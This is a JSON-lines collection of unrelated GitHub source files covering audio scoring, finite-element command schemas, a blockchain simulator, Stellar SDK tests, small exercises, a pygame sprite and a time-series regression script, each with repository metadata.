parser = argparse.ArgumentParser()\n parser.add_argument(\"--target-mos\", \"-t\", type=float, nargs=\"*\")\n parser.add_argument(\"--debug\", \"-d\", \"-v\", action=\"store_true\")\n parser.add_argument(\"file\", type=str, help=\"Path to audio file for DNSMOS evaluation.\")\n args = parser.parse_args()\n init_logger(level=\"DEBUG\" if args.debug else \"INFO\")\n main(args)\n","repo_name":"Rikorose/DeepFilterNet","sub_path":"DeepFilterNet/df/scripts/dnsmos_v2.py","file_name":"dnsmos_v2.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":1512,"dataset":"github-code","pt":"72"} +{"seq_id":"20426608281","text":"from ..Commons import *\nfrom ..Language.DataStructure import *\nfrom ..Language.Syntax import *\n\n\ndef combinaison_charge_prod(self, TABLE_RESU, **args):\n \"\"\"Typage du concept résultat\"\"\"\n if args.get(\"__all__\"):\n return table_sdaster\n\n for m in TABLE_RESU:\n self.type_sdprod(m[\"TBALE\"], table_sdaster)\n\n\nCOMBINAISON_CHARGE = MACRO(\n nom=\"COMBINAISON_CHARGE\",\n op=OPS(\"code_aster.MacroCommands.combinaison_charge_ops.combinaison_charge_ops\"),\n sd_prod=combinaison_charge_prod,\n fr=tr(\"Combinaison des calculs avec des chargements mécaniques et thermiques \"),\n MODELE_MECA=SIMP(statut=\"o\", typ=modele_sdaster),\n MODELE_THER=SIMP(statut=\"f\", typ=modele_sdaster),\n CHAM_MATER_MECA=SIMP(statut=\"o\", typ=cham_mater),\n CARA_ELEM_MECA=SIMP(statut=\"o\", typ=cara_elem),\n CARA_ELEM_THER=SIMP(statut=\"f\", typ=cara_elem),\n BLOC=SIMP(statut=\"o\", typ=(char_meca, char_cine_meca)),\n BLOC_THER=SIMP(statut=\"f\", typ=(char_meca, char_cine_meca)),\n EXCIT_MECA=FACT(\n statut=\"o\",\n max=\"**\",\n CHAR_MECA=SIMP(statut=\"o\", typ=(char_meca, char_cine_meca)),\n NOM_CHAR=SIMP(statut=\"o\", typ=\"TXM\"),\n ),\n EXCIT_THER=FACT(\n statut=\"f\",\n max=\"**\",\n CHAM_MATER_THER=SIMP(statut=\"o\", typ=cham_mater),\n NOM_CHAR=SIMP(statut=\"o\", typ=\"TXM\"),\n ),\n LIST_INST_THER=SIMP(statut=\"f\", typ=(listr8_sdaster, list_inst)),\n COMPORTEMENT=FACT(\n statut=\"f\",\n max=\"**\",\n regles=(UN_PARMI(\"TOUT\", \"GROUP_MA\"),),\n TOUT=SIMP(statut=\"f\", typ=\"TXM\", into=(\"OUI\",)),\n GROUP_MA=SIMP(statut=\"f\", typ=grma, validators=NoRepeat(), max=\"**\"),\n RELATION=SIMP(statut=\"f\", typ=\"TXM\", defaut=\"ELAS\", into=(\"ELAS\", \"MULTIFIBRE\", \"CABLE\")),\n ),\n TABLE_COEF=SIMP(statut=\"o\", typ=table_sdaster),\n CHAM_RESU=FACT(\n statut=\"o\",\n max=\"**\",\n NOM_CHAM=SIMP(statut=\"o\", typ=\"TXM\", validators=NoRepeat(), into=C_NOM_CHAM_INTO()),\n NOM_CMP=SIMP(statut=\"o\", typ=\"TXM\", validators=NoRepeat(), max=\"**\"),\n ),\n TABLE_RESU=FACT(\n statut=\"o\",\n max=3,\n UNITE=SIMP(statut=\"f\", typ=UnitType(), inout=\"out\"),\n OPTION=SIMP(statut=\"o\", typ=\"TXM\", into=(\"COEF_COMB\", \"CALC_COMB\", \"EXTREMA\")),\n TABLE=SIMP(statut=\"o\", typ=CO),\n b_extrema=BLOC(\n condition=\"\"\"equal_to(\"OPTION\", 'EXTREMA')\"\"\",\n CRIT_COMP=SIMP(\n statut=\"f\",\n typ=\"TXM\",\n defaut=\"TOUT\",\n validators=NoRepeat(),\n max=\"**\",\n into=(\"TOUT\", \"MAXI\", \"MAXI_ABS\", \"MINI\", \"MINI_ABS\"),\n ),\n ),\n ),\n IMPRESSION=SIMP(statut=\"f\", typ=\"TXM\", defaut=\"NON\", into=(\"OUI\", \"NON\")),\n b_impression=BLOC(\n condition=\"\"\"equal_to(\"IMPRESSION\", 'OUI')\"\"\",\n UNITE=SIMP(statut=\"o\", typ=UnitType(), inout=\"out\"),\n ),\n)\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/Cata/Commands/combinaison_charge.py","file_name":"combinaison_charge.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73842157354","text":"from Models.Ethereum.Block import Block\nfrom Models.Node import Node as BaseNode\n\n\n#from ImportClasses import Block\nclass Node(BaseNode):\n def __init__(self,id,hashPower): #blockchain=[],transactionsPool=[],unclechain=[],blocks=0,balance=0,uncles=0,hashPower=0.0):\n\n '''Initialize a new miner named name with hashrate measured in hashes per second.'''\n super().__init__(id)#,blockchain,transactionsPool,blocks,balance)\n self.hashPower = hashPower\n self.unclechain = []\n self.uncles= 0 # total number of uncle blocks included in the main chain\n self.blockchain= []# create an array for each miner to store chain state locally\n self.transactionsPool= []\n self.blocks= 0# total number of blocks mined in the main chain\n self.balance= 0# to count all reward that a miner made, including block rewards + uncle rewards + transactions fees\n\n\n def generate_gensis_block():\n from InputsConfig import InputsConfig as p\n for node in p.NODES:\n node.blockchain.append(Block())\n \n # This to allow miners to include uncle blocks in their main blocks\n def add_uncles(miner):\n from InputsConfig import InputsConfig as p\n maxUncles = p.Buncles\n uncles=[]\n\n j=0\n while j < len (miner.unclechain):\n uncleDepth = miner.unclechain[j].depth\n blockDepth = miner.last_block().depth\n if maxUncles>0 and uncleDepth > blockDepth - p.Ugenerations : # to check if uncle block is received and there is space to include it, also check within 6 generation\n uncles.append(miner.unclechain[j])\n del miner.unclechain[j] # delete uncle after inclusion\n j-=1\n maxUncles-=1 # decrease allowable uncles by 1\n j+=1\n\n return uncles\n\n\n ########################################################### reset the state of blockchains for all nodes in the network (before starting the next run) ###########################################################################################\n def resetState():\n from InputsConfig import InputsConfig as p\n for node in p.NODES:\n node.blockchain= [] # create an array for each miner to store chain state locally\n node.transactionsPool= []\n node.unclechain = []\n node.blocks=0 # total number of blocks mined in the main chain\n node.uncles=0 # total number of uncle blocks included in the main chain\n node.balance= 0 # to count all reward that a miner made\n","repo_name":"maher243/BlockSim","sub_path":"Models/Ethereum/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"72"} +{"seq_id":"14065847911","text":"import pytest\nfrom requests.adapters import DEFAULT_POOLSIZE\n\nfrom stellar_base.horizon import HORIZON_TEST, HORIZON_LIVE\nfrom kin.stellar.errors import *\nfrom kin.stellar.horizon import (\n Horizon,\n check_horizon_reply,\n DEFAULT_REQUEST_TIMEOUT,\n DEFAULT_NUM_RETRIES,\n DEFAULT_BACKOFF_FACTOR,\n USER_AGENT,\n)\n\n\ndef test_check_horizon_reply():\n reply = {\n 'type': HORIZON_NS_PREFIX + HorizonErrorType.TRANSACTION_FAILED,\n 'status': 400,\n 'title': 'title',\n 'extras': {\n 'result_codes': {\n 'operations': [PaymentResultCode.NO_TRUST],\n 'transaction': TransactionResultCode.FAILED\n }\n }\n }\n with pytest.raises(HorizonError) as exc_info:\n check_horizon_reply(reply)\n assert exc_info.value.type == HorizonErrorType.TRANSACTION_FAILED\n\n reply = \"{'a':'b'}\"\n check_horizon_reply(reply)\n\n\ndef test_defaults():\n horizon = Horizon.testnet()\n assert horizon\n assert horizon.horizon_uri == HORIZON_TEST\n\n horizon = Horizon.livenet()\n assert horizon\n assert horizon.horizon_uri == HORIZON_LIVE\n\n\ndef test_create_default():\n horizon = Horizon()\n assert horizon\n assert horizon.horizon_uri == HORIZON_TEST\n assert horizon.request_timeout == DEFAULT_REQUEST_TIMEOUT\n assert horizon._session\n assert horizon._session.headers['User-Agent'] == USER_AGENT\n assert horizon._session.adapters['http://']\n assert horizon._session.adapters['https://']\n adapter = horizon._session.adapters['http://']\n assert adapter.max_retries\n assert adapter.max_retries.total == DEFAULT_NUM_RETRIES\n assert adapter.max_retries.backoff_factor == DEFAULT_BACKOFF_FACTOR\n assert adapter.max_retries.redirect == 0\n assert adapter._pool_connections == DEFAULT_POOLSIZE\n assert adapter._pool_maxsize == DEFAULT_POOLSIZE\n\n\ndef test_create_custom():\n horizon_uri = 'horizon_uri'\n pool_size = 5\n num_retries = 10\n request_timeout = 30\n backoff_factor = 5\n horizon = Horizon(horizon_uri=horizon_uri, pool_size=pool_size, num_retries=num_retries,\n request_timeout=request_timeout, backoff_factor=backoff_factor)\n assert horizon\n assert horizon.horizon_uri == horizon_uri\n assert horizon.request_timeout == request_timeout\n assert horizon._session.headers['User-Agent'] == USER_AGENT\n adapter = horizon._session.adapters['http://']\n assert adapter.max_retries.total == num_retries\n assert adapter.max_retries.backoff_factor == backoff_factor\n assert adapter.max_retries.redirect == 0\n assert adapter._pool_connections == pool_size\n assert adapter._pool_maxsize == pool_size\n\n\ndef test_account(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account(address)\n assert reply\n assert reply['id']\n\n\ndef test_account_effects(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_effects('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_effects(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_account_offers(test_sdk):\n # does not raise on nonexistent account!\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_offers(address)\n assert reply\n assert reply['_embedded']\n\n\ndef test_account_operations(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_operations('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_operations(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_account_transactions(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_transactions('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_transactions(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_account_payments(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_payments('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_payments(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_transactions(test_sdk):\n reply = test_sdk.horizon.transactions()\n assert reply\n assert reply['_embedded']['records']\n\n\ndef get_first_tx_hash(test_sdk):\n if not hasattr(test_sdk, 'first_tx_hash'):\n reply = test_sdk.horizon.account_transactions(test_sdk.get_address())\n assert reply\n tx = reply['_embedded']['records'][0]\n assert tx['hash']\n test_sdk.first_tx_hash = tx['hash']\n return test_sdk.first_tx_hash\n\n\ndef test_transaction(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction(tx_id)\n assert reply\n assert reply['id'] == tx_id\n\n assert reply['operation_count'] == 1\n\n\ndef test_transaction_effects(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction_effects('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction_effects(tx_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_transaction_operations(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction_operations('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction_operations(tx_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_transaction_payments(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction_payments('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction_payments(tx_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_order_book(setup, test_sdk):\n params = {\n 'selling_asset_type': 'credit_alphanum4',\n 'selling_asset_code': setup.test_asset.code,\n 'selling_asset_issuer': setup.test_asset.issuer,\n 'buying_asset_type': 'native',\n 'buying_asset_code': 'XLM',\n }\n reply = test_sdk.horizon.order_book(params=params)\n assert reply\n assert reply['base']['asset_code'] == setup.test_asset.code\n\n\ndef test_trades(setup, test_sdk):\n if setup.type == 'testnet': # TODO: returns 404 for local horizon\n # all trades\n reply = test_sdk.horizon.trades()\n assert reply['_embedded']['records']\n\n # specific trades (taken from tesnet horizon)\n params = {\n 'base_asset_type': 'credit_alphanum4',\n 'base_asset_code': 'BTC',\n 'base_asset_issuer': 'GBB7JKBP5ZG7UUHAOYDOHQMIVDRKNMXTCDU3WUDVRV77NZJBEJNL4F2H',\n 'counter_asset_type': 'credit_alphanum4',\n 'counter_asset_code': 'XLM',\n 'counter_asset_issuer': 'GBB7JKBP5ZG7UUHAOYDOHQMIVDRKNMXTCDU3WUDVRV77NZJBEJNL4F2H',\n }\n reply = test_sdk.horizon.trades(params=params)\n assert reply['_embedded']['records']\n\n\ndef test_ledgers(test_sdk):\n reply = test_sdk.horizon.ledgers()\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_ledger(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.ledger('bad')\n assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n reply = test_sdk.horizon.ledger(2)\n assert reply\n assert reply['sequence'] == 2\n\n\ndef test_ledger_effects(test_sdk):\n with pytest.raises(HorizonError, match='Bad Request') as exc_info:\n test_sdk.horizon.ledger_effects('bad')\n assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n reply = test_sdk.horizon.ledger_effects(2)\n assert reply\n assert reply['_embedded']\n\n\ndef test_ledger_operations(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.ledger_operations('bad')\n assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n reply = test_sdk.horizon.ledger_operations(2)\n assert reply\n assert reply['_embedded']\n\n\ndef test_ledger_payments(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.ledger_payments('bad')\n assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n reply = test_sdk.horizon.ledger_payments(2)\n assert reply\n assert reply['_embedded']\n\n\ndef test_effects(test_sdk):\n reply = test_sdk.horizon.effects()\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_operations(test_sdk):\n reply = test_sdk.horizon.operations()\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_operation(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.operation('bad')\n assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n reply = test_sdk.horizon.operations()\n op_id = reply['_embedded']['records'][0]['id']\n\n reply = test_sdk.horizon.operation(op_id)\n assert reply\n assert reply['id'] == op_id\n\n\ndef test_operation_effects(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.operation_effects('bad')\n assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n reply = test_sdk.horizon.operations()\n op_id = reply['_embedded']['records'][0]['id']\n\n reply = test_sdk.horizon.operation_effects(op_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_payments(test_sdk):\n reply = test_sdk.horizon.payments()\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_assets(test_sdk):\n # TODO: 'Resource Missing' with local docker\n # reply = test_sdk.horizon.assets()\n # assert reply\n # assert reply['_embedded']['records']\n pass\n\n\ndef test_horizon_error_hashable(test_sdk):\n err_dict = dict(title='title',\n status=400,\n detail='detail',\n instance='instance',\n extras={},\n type=HORIZON_NS_PREFIX + HorizonErrorType.BAD_REQUEST)\n e = HorizonError(err_dict)\n {e: 1} # shouldn't fail on unhashable type\n","repo_name":"kinecosystem/kin-sdk-python","sub_path":"test/test_horizon.py","file_name":"test_horizon.py","file_ext":"py","file_size_in_byte":10967,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"71891959912","text":"import sys\r\nimport heapq\r\ninput = sys.stdin.readline\r\n\r\nabs_heap = []\r\nN = int(input())\r\nfor _ in range(N): \r\n x = int(input())\r\n if x == 0: \r\n if abs_heap == []: \r\n print(0)\r\n else: \r\n # 절대값이 같은개 여러개이면 작은 값 출력 -> 자동 \r\n print(heapq.heappop(abs_heap)[1]) # 튜플의 두번째 자리에 저장된 실제 원소 값 (x) 출력\r\n\r\n else: \r\n heapq.heappush(abs_heap, (abs(x), x)) # 첫번째 원소를 기준으로 우선순위 힙 정렬 \r\n ","repo_name":"data-sign/algorithm","sub_path":"백준/Silver/11286. 절댓값 힙/절댓값 힙.py","file_name":"절댓값 힙.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74482315111","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import join as pjoin\nimport pytest\n\nfrom daskms.table_schemas import (\n lookup_table_schema,\n MS_SCHEMA,\n ANTENNA_SCHEMA,\n FEED_SCHEMA,\n FIELD_SCHEMA,\n SPECTRAL_WINDOW_SCHEMA,\n OBSERVATION_SCHEMA,\n POLARIZATION_SCHEMA,\n POINTING_SCHEMA,\n)\n\n\n@pytest.mark.parametrize(\n \"filename, schema\",\n [\n (pjoin(\"bob\", \"qux\", f\"FRED.MS{os.sep}\"), MS_SCHEMA),\n (\"test.ms\", MS_SCHEMA),\n (\"test.ms::ANTENNA\", ANTENNA_SCHEMA),\n (\"test.ms::FEED\", FEED_SCHEMA),\n (\"test.ms::FIELD\", FIELD_SCHEMA),\n (\"test.ms::OBSERVATION\", OBSERVATION_SCHEMA),\n (\"test.ms::POINTING\", POINTING_SCHEMA),\n (\"test.ms::POLARIZATION\", POLARIZATION_SCHEMA),\n (\"test.ms::SPECTRAL_WINDOW\", SPECTRAL_WINDOW_SCHEMA),\n ],\n)\ndef test_table_suffix_lookup(filename, schema):\n assert schema == lookup_table_schema(filename, None)\n\n\n@pytest.mark.parametrize(\"schema_name, schema\", [(\"MS\", MS_SCHEMA)])\ndef test_table_schema_name_lookup(schema_name, schema):\n assert schema == lookup_table_schema(\"test.ms\", schema_name)\n","repo_name":"ratt-ru/dask-ms","sub_path":"daskms/tests/test_table_schemas.py","file_name":"test_table_schemas.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"31099742798","text":"# 최소, 최대\n# 구현 \n\nN = int(input())\narr = list(map(int,input().split()))\nmax = arr[0]\nmin = arr[0]\nfor i in range(N) :\n if arr[i] > max :\n max = arr[i]\n elif arr[i] < min :\n min = arr[i]\n\nprint(min,max)","repo_name":"halionaz/Algorithm","sub_path":"baekjoon/10818.py","file_name":"10818.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"47402982850","text":"\"\"\"\nConversions for Planck units to metric units.\n\"\"\"\n\n\n# Convert meters to planck lengths\ndef meters_to_lp(meters: float, rounding: int) -> float: \n\n conversion = 1.61605 * 10**-35\n if meters == 0:\n raise Exception('Cannot calculate zero value!\\n')\n planck_lengths = meters / conversion\n\n return round(planck_lengths, rounding)\n\n\n# Convert planck lengths to meters\ndef lp_to_meters(lp: float, rounding: int) -> float:\n\n conversion = 1.61605 * 10**-35\n meters = lp * conversion\n if lp == 0:\n raise Exception('Cannot calculate zero value!\\n')\n\n return round(meters, rounding)\n","repo_name":"D-Bits/Converty","sub_path":"converty/planck.py","file_name":"planck.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10614669283","text":"'''\n模拟登录\n 如果账号的密码错误3次,提示锁定账户,效果如下:\n 请输入账号:qtx\n 请输入密码:1234\n 登录失败\n 你还剩余 2 次机会\n 请输入账号:Qtx\n 请输入密码:1234\n 登录失败\n 你还剩余 1 次机会\n 请输入账号:Qtx\n 请输入密码:123456\n 登录成功\n'''\nfor i in range(2, -1, -1):\n user = input(\"请输入账号:\")\n pwd = input(\"请输入密码:\")\n if user == \"xiashuobad\" and pwd == \"135456..\":\n print(\"登录成功\")\n break\n if i == 0:\n print(\"连续错误3次,账户已锁定。\")\n break\n print(f\"登录失败,你还剩{i}次机会。\")\n","repo_name":"xiashuo/tedu_execises","sub_path":"month01/day4/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3903041356","text":"from typing import AsyncIterator\n\nfrom ..util.internal import records_to_sources\nfrom ..source.source import BaseSource, Record\n\n\nasync def save(source: BaseSource, *args: Record) -> None:\n \"\"\"\n Update a source's knowledge about given records.\n\n For each record given, call\n :py:func:`update ` on the\n source. Effectively saving all the records to the source.\n\n Parameters\n ----------\n source : BaseSource\n Data source to use. See :doc:`/plugins/dffml_source` for sources and\n options.\n *args : list\n Records to be saved.\n\n Examples\n --------\n\n >>> import asyncio\n >>> import pathlib\n >>> from dffml import *\n >>>\n >>> source = CSVSource(filename=\"save.csv\", allowempty=True, readwrite=True)\n >>>\n >>> async def main():\n ... await save(\n ... source,\n ... Record(\n ... \"myrecord\",\n ... data={\n ... \"features\": {\"Years\": 0, \"Expertise\": 1, \"Trust\": 0.1},\n ... \"prediction\": {\"Salary\": {\"value\": 10, \"confidence\": 1.0}},\n ... }\n ... )\n ... )\n ... print(pathlib.Path(\"save.csv\").read_text().strip())\n >>>\n >>> asyncio.run(main())\n key,tag,Expertise,Trust,Years,prediction_Salary,confidence_Salary\n myrecord,untagged,1,0.1,0,10,1.0\n \"\"\"\n async with records_to_sources(source) as sctx:\n for record in args:\n await sctx.update(record)\n\n\nasync def load(source: BaseSource, *args: str) -> AsyncIterator[Record]:\n \"\"\"\n Yields records from a source.\n\n Yields all the records from the source, if record keys are given then only\n those records are yielded.\n\n Parameters\n ----------\n source : BaseSource\n Data source to use. See :doc:`/plugins/dffml_source` for sources and\n options.\n *args : str\n Records to be returned. If empty, all the records in a source will be returned.\n\n Returns\n -------\n asynciterator\n :py:class:`Record ` object\n\n Examples\n --------\n\n >>> import asyncio\n >>> from dffml import *\n >>>\n >>> source = CSVSource(filename=\"load.csv\", allowempty=True, readwrite=True)\n >>>\n >>> async def main():\n ... await save(\n ... source,\n ... Record(\"1\", data={\"features\": {\"A\": 0, \"B\": 1}}),\n ... Record(\"2\", data={\"features\": {\"A\": 3, \"B\": 4}}),\n ... )\n ...\n ... # All records in source\n ... async for record in load(source):\n ... print(record.export())\n ...\n ... # For specific records in a source\n ... async for record in load(source, \"1\"):\n ... print(record.export())\n ...\n ... # Lightweight source syntax\n ... async for record in load(\"load.csv\", \"2\"):\n ... print(record.export())\n >>>\n >>> asyncio.run(main())\n {'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}\n {'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}\n {'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}\n {'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}\n \"\"\"\n async with records_to_sources(source) as sctx:\n if args:\n # If specific records are to be loaded\n for record in args:\n yield await sctx.record(record)\n else:\n # All the records are loaded\n async for record in sctx.records():\n yield record\n","repo_name":"intel/dffml","sub_path":"dffml/high_level/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"72"} +{"seq_id":"40756468979","text":"from db_connection import DatabaseConnection\n\nconnection = DatabaseConnection()\nconn = connection.dbconnection()\ndb = conn.cursor(buffered=True, dictionary=True)\n\n\ndef book_order(user_id, address):\n \"\"\"\n desc: query to call the procedure where many queries are performed\n param: user_id, order model.\n \"\"\"\n args = [user_id, f'{address}']\n show_data_query = db.callproc('place_order', args)\n conn.commit()\n return show_data_query\n\n\ndef get_data(user_id):\n \"\"\"\n desc: query to call order details\n param: user_id.\n \"\"\"\n query = '''select id from order_details where user_id = %d ''' % user_id\n db.execute(query)\n conn.commit()\n result = db.fetchall()\n return result\n","repo_name":"mule1998/BookStoreApp","sub_path":"service/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5813600406","text":"import random\r\nimport pygame\r\n\r\nANCHO = 800\r\nLARGO = 600\r\n\r\nNEGRO =(0,0,0)\r\nBLANCO =(255,255,255)\r\nROJO =(255,0,0)\r\nH_FA2F22F =(250,47,47)\r\nVERDE =(0,255,0)\r\nAZUL =(0,0,255)\r\n\r\nclass enemy(pygame.sprite.Sprite):\r\n def __init__(self):\r\n #herredar la variable de la clase sprite\r\n super().__init__()\r\n \r\n #cargar enemigo\r\n self.image = pygame.image.load(\"C:/Users/Angel/Desktop/PAGINAS WEB/turtle/videojuego/1.-videojuego/enemigo.png\")\r\n #obtener el rectangulo del sprite\r\n self.rect = self.image.get_rect()\r\n #posicion map\r\n self.rect.center = (200,500)\r\n \r\n #aleatoria\r\n self.rect.x = random.randrange(ANCHO - self.rect.width)\r\n self.rect.y = random.randrange(300 - self.rect.height)\r\n \r\n #movimiento personaje\r\n self.velocidad_x = random.randrange(1,10)\r\n self.velocidad_y = random.randrange(1,10)\r\n \r\n \r\n def update(self):\r\n self.rect.x += self.velocidad_x\r\n self.rect.y += self.velocidad_y\r\n \r\n #limite rango izq\r\n \r\n if self.rect.left < 0 :\r\n self.velocidad_x += 1\r\n #limite rango der \r\n if self.rect.right > ANCHO :\r\n self.velocidad_x -= 1\r\n #limite inferior\r\n if self.rect.bottom > LARGO:\r\n self.velocidad_y -=1\r\n #limite superior\r\n if self.rect.top < 0:\r\n self.velocidad_y += 1\r\n \r\n","repo_name":"Angelnever/libreria-turtle","sub_path":"videojuego/1.-videojuego/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29592829003","text":"# Chang Wei Tan, Christoph Bergmeir, Francois Petitjean, Geoff Webb\n#\n# @article{\n# Tan2020TSER,\n# title={Time Series Extrinsic Regression},\n# author={Tan, Chang Wei and Bergmeir, Christoph and Petitjean, Francois and Webb, Geoffrey I},\n# journal={Data Mining and Knowledge Discovery},\n# pages={1--29},\n# year={2021},\n# publisher={Springer},\n# doi={https://doi.org/10.1007/s10618-021-00745-9}\n# }\n\nimport numpy as np\n\nfrom utils.data_loader import load_from_tsfile_to_dataframe\nfrom utils.regressor_tools import process_data, fit_regressor, calculate_regression_metrics\nfrom utils.tools import create_directory\n\nmodule = \"RegressionExperiment\"\ndata_path = \"data/\"\nproblems = [\"Sample\"] # see data_loader.regression_datasets\nregressors = [\"xgboost\"] # see regressor_tools.all_models\niterations = [1]\nnorm = \"none\" # none, standard, minmax\n\noutput_path = \"output/regression/\"\nif __name__ == '__main__':\n # for each problem\n for problem in problems:\n print(\"#########################################################################\")\n print(\"[{}] Starting Experiments\".format(module))\n print(\"#########################################################################\")\n print(\"[{}] Data path: {}\".format(module, data_path))\n print(\"[{}] Problem: {}\".format(module, problem))\n\n # set data folder, train & test\n data_folder = data_path + problem + \"/\"\n train_file = data_folder + problem + \"_TRAIN.ts\"\n test_file = data_folder + problem + \"_TEST.ts\"\n\n # loading the data. X_train and X_test are dataframe of N x n_dim\n print(\"[{}] Loading data\".format(module))\n X_train, y_train = load_from_tsfile_to_dataframe(train_file)\n X_test, y_test = load_from_tsfile_to_dataframe(test_file)\n\n print(\"[{}] X_train: {}\".format(module, X_train.shape))\n print(\"[{}] X_test: {}\".format(module, X_test.shape))\n\n # in case there are different lengths in the dataset, we need to consider that.\n # assume that all the dimensions are the same length\n print(\"[{}] Finding minimum length\".format(module))\n min_len = np.inf\n for i in range(len(X_train)):\n x = X_train.iloc[i, :]\n all_len = [len(y) for y in x]\n min_len = min(min(all_len), min_len)\n for i in range(len(X_test)):\n x = X_test.iloc[i, :]\n all_len = [len(y) for y in x]\n min_len = min(min(all_len), min_len)\n print(\"[{}] Minimum length: {}\".format(module, min_len))\n\n # process the data into numpy array\n print(\"[{}] Reshaping data\".format(module))\n x_train = process_data(X_train, normalise=norm, min_len=min_len)\n x_test = process_data(X_test, normalise=norm, min_len=min_len)\n\n print(\"[{}] X_train: {}\".format(module, x_train.shape))\n print(\"[{}] X_test: {}\".format(module, x_test.shape))\n\n for regressor_name in regressors:\n print(\"[{}] Regressor: {}\".format(module, regressor_name))\n for itr in iterations:\n # create output directory\n output_directory = \"output/regression/\"\n if norm != \"none\":\n output_directory = \"output/regression_{}/\".format(norm)\n output_directory = output_directory + regressor_name + '/' + problem + '/itr_' + str(itr) + '/'\n create_directory(output_directory)\n\n print(\"[{}] Iteration: {}\".format(module, itr))\n print(\"[{}] Output Dir: 